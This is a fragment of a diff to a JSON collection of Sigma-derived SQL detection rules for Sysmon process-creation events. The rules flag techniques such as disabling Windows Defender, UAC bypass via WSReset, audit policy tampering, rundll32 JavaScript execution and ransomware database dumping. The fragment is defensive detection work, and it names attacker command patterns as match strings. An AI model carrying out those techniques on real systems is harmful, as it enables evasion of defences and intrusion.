'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. 
Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown sub processes of Wsreset.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.s0013", - 
"attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' 
ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_port_forwarding.yml" + }, + { + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "falsepositives": [ + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR 
(CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Unknown" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 
'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": 
"proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE 
'\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + ], + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + }, + { + "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", + "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "status": "test", + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ], + "falsepositives": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_odbcconf_susp_exec.yml" }, { - "title": "Suspicious CodePage Switch Via CHCP", - "id": "c7942406-33dd-4377-a564-0f62db0593a3", + "title": "Shadow Copies Creation Using Operating Systems Utilities", + "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "status": "test", - "description": "Detects a code page switch in command line or batch scripts to a rare language", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "author": 
"Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.t1036", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Administrative activity (adjust code pages according to your organization's region)" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '% 936' ESCAPE '\\' OR CommandLine LIKE '% 1258' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_chcp_codepage_switch.yml" + "filename": "proc_creation_win_susp_shadow_copies_creation.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", - "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LOLBIN Execution Of The FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dinjector.yml" + "filename": 
"proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Application Whitelisting Bypass via PresentationHost.exe", - "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_presentationhost.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", - "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects 
